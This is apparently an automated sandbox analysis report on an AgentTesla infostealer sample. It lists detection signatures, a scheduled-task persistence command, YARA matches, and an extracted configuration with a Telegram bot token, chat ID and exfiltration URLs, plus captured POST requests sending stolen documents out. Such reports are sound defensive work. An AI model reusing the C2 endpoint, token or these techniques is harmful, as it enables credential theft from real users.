Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
e3.exe

Overview

General Information

Sample Name:e3.exe
Analysis ID:626044
MD5:e37f62c85961b9502a0d1599c37e390c
SHA1:1135f2ee15ad11129b07e784e344b16acf07b612
SHA256:63376e3e129b0513baec3a001a0bcc80ed859d0b4c347fd4491add3f54dccfaf
Tags:AgentTeslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Uses a known web browser user agent for HTTP communication
Contains capabilities to detect virtual machines
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • e3.exe (PID: 6384 cmdline: "C:\Users\user\Desktop\e3.exe" MD5: E37F62C85961B9502A0D1599C37E390C)
    • schtasks.exe (PID: 5772 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PhOyTxcSdzas" /XML "C:\Users\user\AppData\Local\Temp\tmp799E.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • e3.exe (PID: 6540 cmdline: {path} MD5: E37F62C85961B9502A0D1599C37E390C)
  • cleanup
{"C2 url": "https://api.telegram.org/bot1341301202:AAHzCj-Eu3mWY1PQc6gP-IXoYKSfMPo3X2w/sendMessage"}
{"Exfil Mode": "Telegram", "Chat id": "1299507057", "Chat URL": "https://api.telegram.org/bot1341301202:AAHzCj-Eu3mWY1PQc6gP-IXoYKSfMPo3X2w/sendDocument"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.636427550.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000004.00000002.636427550.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000004.00000000.407405620.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000004.00000000.407405620.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000000.00000002.418778941.0000000006E10000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_DLAgent05Detects an unknown dropper. Typically exisys as a DLL in base64-encoded gzip-compressed file embedded within another executableditekSHen
          • 0x9430:$s1: MARCUS.dll
          • 0x14e04:$s1: MARCUS.dll
          • 0x14eb8:$s1: MARCUS.dll
          • 0xa188:$s2: GZipStream
          • 0xa17b:$s3: MemoryStream
          • 0xa28d:$s4: proj_name
          • 0xa284:$s5: res_name
          Click to see the 22 entries
          SourceRuleDescriptionAuthorStrings
          0.2.e3.exe.6e10000.4.unpackMALWARE_Win_DLAgent05Detects an unknown dropper. Typically exisys as a DLL in base64-encoded gzip-compressed file embedded within another executableditekSHen
          • 0x7830:$s1: MARCUS.dll
          • 0x13204:$s1: MARCUS.dll
          • 0x132b8:$s1: MARCUS.dll
          • 0x8588:$s2: GZipStream
          • 0x857b:$s3: MemoryStream
          • 0x868d:$s4: proj_name
          • 0x8684:$s5: res_name
          4.0.e3.exe.400000.8.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            4.0.e3.exe.400000.8.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              4.0.e3.exe.400000.8.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                4.0.e3.exe.400000.8.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
                • 0x30d38:$s1: get_kbok
                • 0x3166c:$s2: get_CHoo
                • 0x322c7:$s3: set_passwordIsSet
                • 0x30b23:$s4: get_enableLog
                • 0x3526e:$s8: torbrowser
                • 0x33c51:$s10: logins
                • 0x3352a:$s11: credential
                • 0x2ff0b:$g1: get_Clipboard
                • 0x2ff19:$g2: get_Keyboard
                • 0x2ff26:$g3: get_Password
                • 0x3151a:$g4: get_CtrlKeyDown
                • 0x3152a:$g5: get_ShiftKeyDown
                • 0x3153b:$g6: get_AltKeyDown
                Click to see the 34 entries
                No Sigma rule has matched
                No Snort rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 4.0.e3.exe.400000.8.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1299507057", "Chat URL": "https://api.telegram.org/bot1341301202:AAHzCj-Eu3mWY1PQc6gP-IXoYKSfMPo3X2w/sendDocument"}
                Source: e3.exe.6540.4.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot1341301202:AAHzCj-Eu3mWY1PQc6gP-IXoYKSfMPo3X2w/sendMessage"}
                Source: e3.exeVirustotal: Detection: 70%Perma Link
                Source: e3.exeReversingLabs: Detection: 73%
                Source: e3.exeAvira: detected
                Source: C:\Users\user\AppData\Roaming\PhOyTxcSdzas.exeAvira: detection malicious, Label: HEUR/AGEN.1202709
                Source: C:\Users\user\AppData\Roaming\PhOyTxcSdzas.exeReversingLabs: Detection: 73%
                Source: e3.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\PhOyTxcSdzas.exeJoe Sandbox ML: detected
                Source: 4.0.e3.exe.400000.8.unpackAvira: Label: TR/Spy.Gen8
                Source: 4.0.e3.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                Source: 4.0.e3.exe.400000.12.unpackAvira: Label: TR/Spy.Gen8
                Source: 4.0.e3.exe.400000.6.unpackAvira: Label: TR/Spy.Gen8
                Source: 4.0.e3.exe.400000.10.unpackAvira: Label: TR/Spy.Gen8
                Source: 4.2.e3.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                Source: e3.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49848 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 52.20.78.240:443 -> 192.168.2.6:49849 version: TLS 1.2
                Source: e3.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Source: C:\Users\user\Desktop\e3.exeCode function: 4x nop then jmp 0727C399h

                Networking

                barindex
                Source: unknownDNS query: name: api.telegram.org
                Source: unknownDNS query: name: api.telegram.org
                Source: unknownDNS query: name: api.telegram.org
                Source: C:\Users\user\Desktop\e3.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\Desktop\e3.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\Desktop\e3.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\Desktop\e3.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\Desktop\e3.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\Desktop\e3.exeDNS query: name: api.ipify.org
                Source: Yara matchFile source: 4.0.e3.exe.400000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.0.e3.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e3.exe.7170000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.0.e3.exe.400000.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e3.exe.3a0d710.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.0.e3.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.0.e3.exe.400000.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.e3.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e3.exe.3bb8860.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e3.exe.3b82640.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.419018802.0000000007170000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: global trafficHTTP traffic detected: POST /bot1341301202:AAHzCj-Eu3mWY1PQc6gP-IXoYKSfMPo3X2w/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da35006fbb73acHost: api.telegram.orgContent-Length: 68743Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot1341301202:AAHzCj-Eu3mWY1PQc6gP-IXoYKSfMPo3X2w/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da3500fe20e7c2Host: api.telegram.orgContent-Length: 1027Expect: 100-continue
                Source: global trafficHTTP traffic detected: POST /bot1341301202:AAHzCj-Eu3mWY1PQc6gP-IXoYKSfMPo3X2w/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da3501b895e279Host: api.telegram.orgContent-Length: 1900Expect: 100-continueConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 52.20.78.240 52.20.78.240
                Source: Joe Sandbox ViewIP Address: 52.20.78.240 52.20.78.240
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                Source: e3.exe, 00000004.00000002.638824586.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                Source: e3.exe, 00000004.00000002.640880683.0000000003172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8fOOnocu1ayHdFsuv.com
                Source: e3.exe, 00000004.00000002.638824586.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNS
                Source: e3.exe, 00000004.00000002.638824586.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://QRkfxD.com
                Source: e3.exe, 00000004.00000002.641057678.0000000003188000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000004.00000002.641346109.00000000031A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: e3.exe, 00000004.00000002.643087096.00000000075C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: e3.exe, 00000004.00000002.643087096.00000000075C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.micS
                Source: e3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                Source: e3.exe, 00000000.00000002.413876682.0000000002871000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000004.00000002.638824586.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: e3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: e3.exe, 00000000.00000003.380108100.00000000057D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesi
                Source: e3.exe, 00000000.00000003.379998185.00000000057D0000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000000.00000003.379759083.00000000057EE000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000000.00000003.379911231.00000000057EE000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000000.00000003.379665691.00000000057D0000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000000.00000003.379957700.00000000057D0000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000000.00000003.379926113.00000000057D0000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000000.00000003.379837233.00000000057D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html
                Source: e3.exe, 00000000.00000003.375552900.00000000057D0000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000000.00000003.375281806.00000000057D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com
                Source: e3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: e3.exe, 00000000.00000003.375281806.00000000057D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comt
                Source: e3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: e3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: e3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: e3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: e3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                Source: e3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: e3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: e3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: e3.exe, 00000000.00000002.413430476.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comm
                Source: e3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: e3.exe, 00000000.00000003.374775375.00000000057CD000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000000.00000003.374974192.00000000057D0000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000000.00000003.374927044.00000000057CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: e3.exe, 00000000.00000003.374292518.00000000057CE000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000000.00000003.374245797.00000000057CE000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000000.00000003.374267240.00000000057CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
                Source: e3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: e3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: e3.exe, 00000000.00000003.374704455.00000000057CD000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000000.00000003.374775375.00000000057CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnht#
                Source: e3.exe, 00000000.00000003.374704455.00000000057CD000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000000.00000003.374775375.00000000057CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnhtG
                Source: e3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: e3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: e3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: e3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: e3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: e3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: e3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: e3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: e3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: e3.exe, 00000000.00000003.373651905.00000000057B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.neth
                Source: e3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: e3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000000.00000003.375200245.00000000057D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: e3.exe, 00000000.00000003.375200245.00000000057D0000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000000.00000003.375281806.00000000057D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cna
                Source: e3.exe, 00000004.00000002.638824586.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                Source: e3.exe, 00000004.00000002.638824586.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                Source: e3.exe, 00000004.00000002.638824586.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org4
                Source: e3.exe, 00000004.00000002.638824586.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgGETMozilla/5.0
                Source: e3.exe, 00000004.00000002.641346109.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000004.00000002.638824586.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: e3.exe, 00000000.00000002.416036513.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000004.00000002.636427550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, e3.exe, 00000004.00000000.407405620.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot1341301202:AAHzCj-Eu3mWY1PQc6gP-IXoYKSfMPo3X2w/
                Source: e3.exe, 00000004.00000002.638824586.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot1341301202:AAHzCj-Eu3mWY1PQc6gP-IXoYKSfMPo3X2w/sendDocument
                Source: e3.exe, 00000004.00000002.638824586.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot1341301202:AAHzCj-Eu3mWY1PQc6gP-IXoYKSfMPo3X2w/sendDocumentdocument-----
                Source: e3.exe, 00000004.00000002.641346109.00000000031A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4
                Source: e3.exe, 00000004.00000002.641057678.0000000003188000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.orgD8
                Source: e3.exe, 00000000.00000002.416036513.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000004.00000002.636427550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, e3.exe, 00000004.00000000.407405620.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                Source: e3.exe, 00000004.00000002.638824586.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                Source: unknownHTTP traffic detected: POST /bot1341301202:AAHzCj-Eu3mWY1PQc6gP-IXoYKSfMPo3X2w/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da35006fbb73acHost: api.telegram.orgContent-Length: 68743Expect: 100-continueConnection: Keep-Alive
                Source: unknownDNS traffic detected: queries for: api.telegram.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49848 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 52.20.78.240:443 -> 192.168.2.6:49849 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: C:\Users\user\Desktop\e3.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\e3.exe
                Source: C:\Users\user\Desktop\e3.exeWindow created: window name: CLIPBRDWNDCLASS

                System Summary

                barindex
                Source: 0.2.e3.exe.6e10000.4.unpack, type: UNPACKEDPEMatched rule: Detects an unknown dropper. Typically exisys as a DLL in base64-encoded gzip-compressed file embedded within another executable Author: ditekSHen
                Source: 4.0.e3.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 4.0.e3.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 0.2.e3.exe.6e10000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects an unknown dropper. Typically exisys as a DLL in base64-encoded gzip-compressed file embedded within another executable Author: ditekSHen
                Source: 0.2.e3.exe.3b82640.3.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 4.0.e3.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 4.0.e3.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 4.0.e3.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 4.2.e3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 0.2.e3.exe.3bb8860.2.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 0.2.e3.exe.3b82640.3.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 00000000.00000002.418778941.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects an unknown dropper. Typically exisys as a DLL in base64-encoded gzip-compressed file embedded within another executable Author: ditekSHen
                Source: 00000004.00000002.638824586.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: Process Memory Space: e3.exe PID: 6540, type: MEMORYSTRMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 4.0.e3.exe.400000.8.unpack, u003cPrivateImplementationDetailsu003eu007bA655675Fu002dE9E0u002d4DE3u002dB246u002dBBB7938B5B94u007d/u0032F2EB27Bu002dE40Cu002d48B4u002d89A1u002d9CDCBF25B43D.csLarge array initialization: .cctor: array initializer size 12012
                Source: 4.0.e3.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007bA655675Fu002dE9E0u002d4DE3u002dB246u002dBBB7938B5B94u007d/u0032F2EB27Bu002dE40Cu002d48B4u002d89A1u002d9CDCBF25B43D.csLarge array initialization: .cctor: array initializer size 12012
                Source: 4.0.e3.exe.400000.12.unpack, u003cPrivateImplementationDetailsu003eu007bA655675Fu002dE9E0u002d4DE3u002dB246u002dBBB7938B5B94u007d/u0032F2EB27Bu002dE40Cu002d48B4u002d89A1u002d9CDCBF25B43D.csLarge array initialization: .cctor: array initializer size 12012
                Source: 4.0.e3.exe.400000.6.unpack, u003cPrivateImplementationDetailsu003eu007bA655675Fu002dE9E0u002d4DE3u002dB246u002dBBB7938B5B94u007d/u0032F2EB27Bu002dE40Cu002d48B4u002d89A1u002d9CDCBF25B43D.csLarge array initialization: .cctor: array initializer size 12012
                Source: e3.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                Source: 0.2.e3.exe.6e10000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent05 author = ditekSHen, description = Detects an unknown dropper. Typically exisys as a DLL in base64-encoded gzip-compressed file embedded within another executable, clamav_sig = MALWARE.Win.Trojan.DLAgent05
                Source: 4.0.e3.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 4.0.e3.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.e3.exe.6e10000.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent05 author = ditekSHen, description = Detects an unknown dropper. Typically exisys as a DLL in base64-encoded gzip-compressed file embedded within another executable, clamav_sig = MALWARE.Win.Trojan.DLAgent05
                Source: 0.2.e3.exe.3b82640.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 4.0.e3.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 4.0.e3.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 4.0.e3.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 4.2.e3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.e3.exe.3bb8860.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.e3.exe.3b82640.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 00000000.00000002.418778941.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_DLAgent05 author = ditekSHen, description = Detects an unknown dropper. Typically exisys as a DLL in base64-encoded gzip-compressed file embedded within another executable, clamav_sig = MALWARE.Win.Trojan.DLAgent05
